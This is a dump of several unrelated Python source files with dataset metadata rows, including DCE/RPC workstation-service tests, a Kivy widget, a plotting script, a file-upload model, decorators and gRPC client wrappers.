def test_hNetrAddAlternateComputerName(self):
dce, rpctransport = self.connect()
try:
resp2= wkst.hNetrAddAlternateComputerName(dce, 'FREEFLY\x00', NULL, NULL)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrRemoveAlternateComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrRemoveAlternateComputerName()
req['ServerName'] = '\x00'*10
req['AlternateName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_hNetrRemoveAlternateComputerName(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrRemoveAlternateComputerName(dce,'FREEFLY\x00', NULL, NULL )
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0 and str(e).find('ERROR_INVALID_PASSWORD') < 0:
raise
def test_NetrSetPrimaryComputerName(self):
dce, rpctransport = self.connect()
req = wkst.NetrSetPrimaryComputerName()
req['ServerName'] = '\x00'*10
req['PrimaryName'] = 'FREEFLY\x00'
req['DomainAccount'] = NULL
req['EncryptedPassword'] = NULL
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_hNetrSetPrimaryComputerName(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrSetPrimaryComputerName(dce,'FREEFLY\x00', NULL, NULL )
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
if str(e).find('ERROR_INVALID_PARAMETER') < 0:
raise
def test_NetrEnumerateComputerNames(self):
dce, rpctransport = self.connect()
req = wkst.NetrEnumerateComputerNames()
req['ServerName'] = '\x00'*10
req['NameType'] = wkst.NET_COMPUTER_NAME_TYPE.NetAllComputerNames
#req.dump()
try:
resp2 = dce.request(req)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
raise
def test_hNetrEnumerateComputerNames(self):
dce, rpctransport = self.connect()
try:
resp2 = wkst.hNetrEnumerateComputerNames(dce,wkst.NET_COMPUTER_NAME_TYPE.NetAllComputerNames)
resp2.dump()
except Exception, e:
if str(e).find('ERROR_NOT_SUPPORTED') < 0:
raise
class SMBTransport(WKSTTests):
def setUp(self):
WKSTTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.stringBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.machine
self.ts = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0')
class SMBTransport64(WKSTTests):
def setUp(self):
WKSTTests.setUp(self)
configFile = ConfigParser.ConfigParser()
configFile.read('dcetests.cfg')
self.username = configFile.get('SMBTransport', 'username')
self.domain = configFile.get('SMBTransport', 'domain')
self.serverName = configFile.get('SMBTransport', 'servername')
self.password = configFile.get('SMBTransport', 'password')
self.machine = configFile.get('SMBTransport', 'machine')
self.hashes = configFile.get('SMBTransport', 'hashes')
self.stringBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.machine
self.ts = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
# Process command-line arguments.
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
testcase = sys.argv[1]
suite = unittest.TestLoader().loadTestsFromTestCase(globals()[testcase])
else:
suite = unittest.TestLoader().loadTestsFromTestCase(SMBTransport)
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(SMBTransport64))
unittest.TextTestRunner(verbosity=1).run(suite)
| 33.52513 | 152 | 0.586125 | 1,926 | 19,344 | 5.798027 | 0.135514 | 0.047014 | 0.056148 | 0.067968 | 0.647354 | 0.607415 | 0.562819 | 0.497806 | 0.39966 | 0.373511 | 0 | 0.043491 | 0.277295 | 19,344 | 576 | 153 | 33.583333 | 0.755293 | 0.04177 | 0 | 0.648649 | 0 | 0 | 0.167148 | 0.054589 | 0 | 0 | 0.002727 | 0 | 0.004505 | 0 | null | null | 0.051802 | 0.013514 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
37f34a605a38158fa9015595b01c813e49baa7a2 | 656 | py | Python | kivy/uix/stencilview.py | hansent/kivy | fdd0ff3b5db127ec53f9b37e8666a4bd77e5b983 | [
"MIT"
] | 2 | 2015-10-26T12:35:37.000Z | 2020-11-26T12:06:09.000Z | kivy/uix/stencilview.py | 5y/kivy | 6bee66946f5434ca92921a8bc9559d82ec955896 | [
"MIT"
] | null | null | null | kivy/uix/stencilview.py | 5y/kivy | 6bee66946f5434ca92921a8bc9559d82ec955896 | [
"MIT"
] | 3 | 2015-07-18T11:03:59.000Z | 2018-03-17T01:32:42.000Z | '''
Stencil View
============
.. versionadded:: 1.0.4
:class:`StencilView` limits the drawing of child widgets to the StencilView's
bounding box. Any drawing outside the bounding box will be clipped (trashed).
The StencilView uses the stencil graphics instructions under the hood. It
provides an efficient way to clip the drawing area of children.
.. note::
As with the stencil graphics instructions, you cannot stack more than 8
stencil-aware widgets.
'''
__all__ = ('StencilView', )
from kivy.uix.widget import Widget
class StencilView(Widget):
'''StencilView class. See module documentation for more information.
'''
pass
| 21.866667 | 77 | 0.72561 | 88 | 656 | 5.363636 | 0.670455 | 0.067797 | 0.076271 | 0.127119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007449 | 0.181402 | 656 | 29 | 78 | 22.62069 | 0.871508 | 0.810976 | 0 | 0 | 0 | 0 | 0.100917 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
37fec28a3d8a1de4a4909b8b2901bbd437972313 | 2,436 | py | Python | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | 52 | 2021-01-08T13:10:46.000Z | 2022-03-28T16:15:16.000Z | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | null | null | null | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | 2 | 2021-05-07T04:53:12.000Z | 2021-11-29T00:40:14.000Z | import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
import imageio as io
import matplotlib.pyplot as plt
import pandas as pd
from polyp_utils import *
from PraNet.lib.PraNet_Res2Net import PraNet
from PraNet.utils.dataloader import test_dataset
import pathlib
import random
from scipy.stats import norm
from skimage.transform import resize
import seaborn as sns
from tqdm import tqdm
import pdb
# TODO: All of this is very preliminary code for the CLT only. Will need to expand (see imagenet)
def plot_histogram(num_components, output_dir):
plt.hist(num_components, alpha=0.7, density=True)
ax = plt.gca()
sns.despine(top=True, right=True, ax=ax)
plt.tight_layout()
plt.savefig( output_dir + 'num_connected_components_histogram.pdf' )
def plot_examples(img_names, sigmoids, masks, num_components, desired_num_components, num_images):
fig, axs = plt.subplots(nrows = 3*len(desired_num_components), ncols = num_images, figsize = (num_images * 10, 10*(3*len(desired_num_components))))
for i in range(num_images):
for r in range(len(desired_num_components)):
filtered_names = img_names[num_components == desired_num_components[r]]
filtered_sigmoids = sigmoids[num_components == desired_num_components[r]]
filtered_masks = masks[num_components == desired_num_components[r]]
if filtered_masks.shape[0] <= i:
continue
axs[3*r,i].axis('off')
axs[3*r,i].imshow(io.imread(filtered_names[i]), aspect='equal')
axs[3*r+1,i].axis('off')
axs[3*r+1,i].imshow(find_peaks(filtered_sigmoids[i]), aspect='equal')
axs[3*r+2,i].axis('off')
axs[3*r+2,i].imshow(filtered_masks[i], aspect='equal')
plt.tight_layout()
plt.savefig(f'outputs/grid_fig/{desired_num_components}_conn_comp_grid_fig.pdf')
if __name__ == '__main__':
sns.set(palette='pastel', font='serif')
sns.set_style('white')
fix_randomness()
cache_path = './.cache/'
output_dir = 'outputs/histograms/'
pathlib.Path(cache_path).mkdir(parents=True, exist_ok=True)
pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)
img_names, sigmoids, masks, regions, num_components = get_data(cache_path)
plot_histogram(num_components, output_dir)
plot_examples(img_names, sigmoids, masks, num_components, (1,2,3), 5)
| 41.288136 | 152 | 0.708128 | 360 | 2,436 | 4.569444 | 0.388889 | 0.134347 | 0.097264 | 0.055927 | 0.32462 | 0.262614 | 0.106991 | 0.055927 | 0 | 0 | 0 | 0.01197 | 0.176929 | 2,436 | 58 | 153 | 42 | 0.808479 | 0.039409 | 0 | 0.038462 | 0 | 0 | 0.076133 | 0.043627 | 0 | 0 | 0 | 0.017241 | 0 | 1 | 0.038462 | false | 0 | 0.326923 | 0 | 0.365385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
5306d223fe4ac3866d53ddff2cdf000a8fabc8a3 | 4,568 | py | Python | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | from portality.dao import DomainObject
from datetime import datetime
from copy import deepcopy
class FileUpload(DomainObject):
__type__ = "upload"
@property
def status(self):
return self.data.get("status")
@property
def local_filename(self):
return self.id + ".xml"
@property
def filename(self):
return self.data.get("filename")
@property
def schema(self):
return self.data.get("schema")
@property
def owner(self):
return self.data.get("owner")
@property
def imported(self):
return self.data.get("imported", 0)
@property
def failed_imports(self):
return self.data.get("failed", 0)
@property
def updates(self):
return self.data.get("update", 0)
@property
def new(self):
return self.data.get("new", 0)
@property
def error(self):
return self.data.get("error")
@property
def error_details(self):
return self.data.get("error_details")
@property
def failure_reasons(self):
return self.data.get("failure_reasons", {})
@property
def created_timestamp(self):
if "created_date" not in self.data:
return None
return datetime.strptime(self.data["created_date"], "%Y-%m-%dT%H:%M:%SZ")
def set_schema(self, s):
self.data["schema"] = s
def upload(self, owner, filename, status="incoming"):
self.data["filename"] = filename
self.data["owner"] = owner
self.data["status"] = status
def failed(self, message, details=None):
self.data["status"] = "failed"
self.data["error"] = message
if details is not None:
self.data["error_details"] = details
def validated(self, schema):
self.data["status"] = "validated"
self.data["schema"] = schema
def processed(self, count, update, new):
self.data["status"] = "processed"
self.data["imported"] = count
self.data["update"] = update
self.data["new"] = new
def partial(self, success, fail, update, new):
self.data["status"] = "partial"
self.data["imported"] = success
self.data["failed"] = fail
self.data["update"] = update
self.data["new"] = new
def set_failure_reasons(self, shared, unowned, unmatched):
self.data["failure_reasons"] = {}
if shared is not None and len(shared) > 0:
self.data["failure_reasons"]["shared"] = shared
if unowned is not None and len(unowned) > 0:
self.data["failure_reasons"]["unowned"] = unowned
if unmatched is not None and len(unmatched) > 0:
self.data["failure_reasons"]["unmatched"] = unmatched
def exists(self):
self.data["status"] = "exists"
def downloaded(self):
self.data["status"] = "downloaded"
@classmethod
    def list_valid(cls):
        q = ValidFileQuery()
        return cls.iterate(q=q.query(), page_size=10000)
@classmethod
    def list_remote(cls):
        q = ExistsFileQuery()
        return cls.iterate(q=q.query(), page_size=10000)
@classmethod
    def by_owner(cls, owner, size=10):
        q = OwnerFileQuery(owner, size)
        res = cls.query(q=q.query())
        rs = [FileUpload(**r.get("_source")) for r in res.get("hits", {}).get("hits", [])]
        return rs
class ValidFileQuery(object):
    base_query = {
        "query" : {
            "term" : { "status.exact" : "validated" }
        },
        "sort" : [
            {"created_date" : "asc"}
        ]
    }

    def __init__(self):
        self._query = deepcopy(self.base_query)

    def query(self):
        return self._query


class ExistsFileQuery(object):
    base_query = {
        "query" : {
            "term" : { "status.exact" : "exists" }
        },
        "sort" : [
            {"created_date" : "asc"}
        ]
    }

    def __init__(self):
        self._query = deepcopy(self.base_query)

    def query(self):
        return self._query


class OwnerFileQuery(object):
    base_query = {
        "query" : {
            "bool" : {
                "must" : []
            }
        },
        "sort" : [
            {"created_date" : "desc"}
        ],
        "size" : 10
    }

    def __init__(self, owner, size=10):
        self._query = deepcopy(self.base_query)
        owner_term = {"match" : {"owner" : owner}}
        self._query["query"]["bool"]["must"].append(owner_term)
        self._query["size"] = size

    def query(self):
        return self._query
| 26.102857 | 90 | 0.563485 | 517 | 4,568 | 4.866538 | 0.193424 | 0.117647 | 0.083466 | 0.078696 | 0.352146 | 0.213434 | 0.170111 | 0.142289 | 0.142289 | 0.112878 | 0 | 0.007132 | 0.294002 | 4,568 | 174 | 91 | 26.252874 | 0.773023 | 0 | 0 | 0.309859 | 0 | 0 | 0.124562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21831 | false | 0 | 0.056338 | 0.105634 | 0.471831 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
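The query classes above all follow one pattern: a class-level `base_query` template that each instance deep-copies and then mutates. A standalone sketch of that pattern (it mirrors `OwnerFileQuery` for illustration; it is not the library code itself):

```python
from copy import deepcopy


class OwnerFileQuery(object):
    # Shared template; every instance works on its own deep copy, so
    # mutating one query never leaks into the class-level template.
    base_query = {
        "query": {"bool": {"must": []}},
        "sort": [{"created_date": "desc"}],
        "size": 10,
    }

    def __init__(self, owner, size=10):
        self._query = deepcopy(self.base_query)
        self._query["query"]["bool"]["must"].append({"match": {"owner": owner}})
        self._query["size"] = size

    def query(self):
        return self._query


q1 = OwnerFileQuery("alice", size=5)
q2 = OwnerFileQuery("bob")
print(q1.query()["size"])   # 5
print(q2.query()["size"])   # 10
print(OwnerFileQuery.base_query["query"]["bool"]["must"])  # [] -- template untouched
```

The `deepcopy` is the important detail: a shallow copy would share the nested `must` list between instances, so every query would accumulate every owner ever requested.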
530c4df647a13365c8f0227162e8cc89f9712855 | 628 | py | Python | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | import functools
def FuncDecoratorOne(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print("Calling: ", func.__name__)
        return func(*args, **kwargs)
    return wrapper


def FuncDecoratorListProperties(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print("Object's properties: ", args[0].__dict__)
        return func(*args, **kwargs)
    return wrapper


def ClassDecoratorOne(c):
    __init__ = c.__init__

    @functools.wraps(c.__init__)
    def wrapper(_self_, *args, **kwargs):
        __init__(_self_, *args, **kwargs)
    c.__init__ = wrapper
return c | 25.12 | 56 | 0.648089 | 69 | 628 | 5.434783 | 0.333333 | 0.16 | 0.096 | 0.117333 | 0.442667 | 0.442667 | 0.442667 | 0.250667 | 0.250667 | 0 | 0 | 0.002037 | 0.218153 | 628 | 25 | 57 | 25.12 | 0.761711 | 0 | 0 | 0.4 | 0 | 0 | 0.047695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.05 | 0 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
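A quick usage sketch for the function-decorator pattern shown above (the decorated `add` function is a made-up example, not part of the original file):

```python
import functools


def FuncDecoratorOne(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        print("Calling: ", func.__name__)
        return func(*args, **kwargs)
    return wrapper


@FuncDecoratorOne
def add(x, y):
    """Add two numbers."""
    return x + y


result = add(2, 3)   # prints: Calling:  add
print(result)        # 5
print(add.__name__)  # add -- preserved by functools.wraps
```

Without `functools.wraps`, `add.__name__` would report `wrapper` and the docstring would be lost, which is why both decorators in the file apply it.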
53127463f07bb2f8aec8cb1df1a287f7d5bd6f21 | 198 | py | Python | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | """
Version string
"""
import logging
# Set default logging format
logging.basicConfig(format="%(asctime)s [%(levelname)s] %(funcName)s: %(message)s")
# Current version tag
__version__ = "4.5.0"
| 16.5 | 83 | 0.70202 | 26 | 198 | 5.192308 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017341 | 0.126263 | 198 | 11 | 84 | 18 | 0.763006 | 0.313131 | 0 | 0 | 0 | 0 | 0.456693 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
53190952988c51863b52803652f2d1243d99e6c7 | 199 | py | Python | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | """
cheesyutils - A number of utility packages and functions
"""
__title__ = "cheesyutils"
__author__ = "CheesyGamer77"
__copyright__ = "Copyright 2021-present CheesyGamer77"
__version__ = "0.0.30"
| 22.111111 | 56 | 0.758794 | 21 | 199 | 6.428571 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069364 | 0.130653 | 199 | 8 | 57 | 24.875 | 0.710983 | 0.281407 | 0 | 0 | 0 | 0 | 0.488889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
532cf925096abcaa0148944dc57a952355c7f148 | 4,162 | py | Python | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 37 | 2017-04-12T12:34:49.000Z | 2022-03-29T04:39:51.000Z | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 2 | 2017-05-03T08:29:34.000Z | 2017-06-16T07:56:18.000Z | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 11 | 2017-05-01T19:19:07.000Z | 2021-04-01T04:31:07.000Z | SHORT_DESCRIPTION = "Sorter organises/sorts files using a customised search function to group those that have similar characteristics into a single folder. Similar characteristics include file type, file name or part of the name and file category. You can put all letters documents into one folder, all images with the word home into another, all music by one artist in yet another folder, etc."
SOURCE_DESCRIPTION = "SOURCE (required)\nThis is the folder in which the sorting should be done i.e the folder containing the disorganised files."
DESTINATION_DESCRIPTION = "DESTINATION (optional)\nAn optional destination (a folder) where the user would want the sorted files/folders to be moved to."
RECURSIVE_DESCRIPTION = "LOOK INTO SUB-FOLDERS (optional)\nChecks into every child folder, starting from the source folder, and groups/sorts the files accordingly."
TYPES_DESCRIPTION = "SELECT FILE TYPES (optional)\nSelect the specific file types/formats to be sorted."
SEARCH_DESCRIPTION = "SEARCH FOR (optional)\nDirects Sorter to search and only group files with names containing this value. If this is enabled then, by default, Sort Folders option is enabled to enable the sorted files to be moved to a folder whose name will be the value provided here. The search is case-insensitive but the final folder will adopt the case styles."
GROUP_FOLDER_DESCRIPTION = "GROUP INTO FOLDER (optional)\nMoves all files (and folders) fitting the search descriptions into a folder named by the value provided in this option."
BY_EXTENSION_DESCRIPTION = "GROUP BY FILE TYPE (optional)\nGroups files in the destination and according to their file type. That is, all JPGs different from PDFs different from DOCXs."
CLEANUP_DESCRIPTION = "PERFORM CLEANUP (optional)\nLooks into the child folders of the source folder and removes those which are empty."
NOTE = "Note:\nIf you want a folder and its contents to be left as is (i.e. not to be sorted or affected in any way), just add a file named `.signore` (no extension) into the folder."
HELP_MESSAGE = "How it Works \n" + SHORT_DESCRIPTION + "\n\nBelow is a description of the fields required to achieve results using Sorter:\n\n" + SOURCE_DESCRIPTION + "\n\n" + DESTINATION_DESCRIPTION + \
"\n\n" + SEARCH_DESCRIPTION + "\n\n" + RECURSIVE_DESCRIPTION + \
"\n\n" + TYPES_DESCRIPTION + "\n\n" + \
GROUP_FOLDER_DESCRIPTION + "\n\n" + BY_EXTENSION_DESCRIPTION + "\n\n" + CLEANUP_DESCRIPTION + \
"\n\n" + NOTE
COPYRIGHT_MESSAGE = "Copyright \u00a9 2017\n\nAswa Paul\nAll rights reserved.\n\n"
HOMEPAGE = "https://giantas.github.io/sorter"
SOURCE_CODE = "https://github.com/giantas/sorter"
LICENSE = """BSD 3-Clause License
Copyright (c) 2017, Aswa Paul
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
| 84.938776 | 395 | 0.787122 | 635 | 4,162 | 5.119685 | 0.406299 | 0.006152 | 0.03199 | 0.006767 | 0.056598 | 0.041833 | 0.041833 | 0.041833 | 0.041833 | 0.041833 | 0 | 0.003408 | 0.154012 | 4,162 | 48 | 396 | 86.708333 | 0.919909 | 0 | 0 | 0 | 0 | 0.214286 | 0.851514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5330d2e4e5607ceb102bed9dc4746159b7edcdc0 | 4,206 | py | Python | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | null | null | null | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | 5 | 2021-11-23T09:43:28.000Z | 2021-12-17T15:09:06.000Z | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | 1 | 2022-02-22T08:54:57.000Z | 2022-02-22T08:54:57.000Z | # Copyright 2021 ONDEWO GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.longrunning.operations_pb2 import Operation
from google.protobuf.empty_pb2 import Empty
from ondewo.nlu.core.services_interface import ServicesInterface
from ondewo.nlu.entity_type_pb2 import (
BatchCreateEntitiesRequest,
BatchDeleteEntitiesRequest,
BatchDeleteEntityTypesRequest,
BatchUpdateEntitiesRequest,
BatchUpdateEntityTypesRequest,
CreateEntityTypeRequest,
DeleteEntityTypeRequest,
EntityType,
GetEntityTypeRequest,
ListEntityTypesRequest,
ListEntityTypesResponse,
UpdateEntityTypeRequest, BatchDeleteEntitiesResponse, BatchEntitiesResponse, BatchGetEntitiesRequest,
ListEntitiesRequest, ListEntitiesResponse,
)
from ondewo.nlu.entity_type_pb2_grpc import EntityTypesStub
class EntityTypes(ServicesInterface):
    """
    Exposes the entity-type-related endpoints of ONDEWO NLU services in a user-friendly way.

    See entity_type.proto.
    """

    @property
    def stub(self) -> EntityTypesStub:
        stub: EntityTypesStub = EntityTypesStub(channel=self.grpc_channel)
        return stub

    def list_entity_types(self, request: ListEntityTypesRequest) -> ListEntityTypesResponse:
        response: ListEntityTypesResponse = self.stub.ListEntityTypes(request, metadata=self.metadata)
        return response

    def get_entity_type(self, request: GetEntityTypeRequest) -> EntityType:
        response: EntityType = self.stub.GetEntityType(request, metadata=self.metadata)
        return response

    def create_entity_type(self, request: CreateEntityTypeRequest) -> EntityType:
        response: EntityType = self.stub.CreateEntityType(request, metadata=self.metadata)
        return response

    def update_entity_type(self, request: UpdateEntityTypeRequest) -> EntityType:
        response: EntityType = self.stub.UpdateEntityType(request, metadata=self.metadata)
        return response

    def delete_entity_type(self, request: DeleteEntityTypeRequest) -> Empty:
        response: Empty = self.stub.DeleteEntityType(request, metadata=self.metadata)
        return response

    def batch_update_entity_types(self, request: BatchUpdateEntityTypesRequest) -> Operation:
        response: Operation = self.stub.BatchUpdateEntityTypes(request, metadata=self.metadata)
        return response

    def batch_delete_entity_types(self, request: BatchDeleteEntityTypesRequest) -> Operation:
        response: Operation = self.stub.BatchDeleteEntityTypes(request, metadata=self.metadata)
        return response

    def batch_create_entities(self, request: BatchCreateEntitiesRequest) -> BatchEntitiesResponse:
        response: BatchEntitiesResponse = self.stub.BatchCreateEntities(request, metadata=self.metadata)
        return response

    def batch_update_entities(self, request: BatchUpdateEntitiesRequest) -> BatchEntitiesResponse:
        response: BatchEntitiesResponse = self.stub.BatchUpdateEntities(request, metadata=self.metadata)
        return response

    def batch_get_entities(self, request: BatchGetEntitiesRequest) -> BatchEntitiesResponse:
        response: BatchEntitiesResponse = self.stub.BatchGetEntities(request, metadata=self.metadata)
        return response

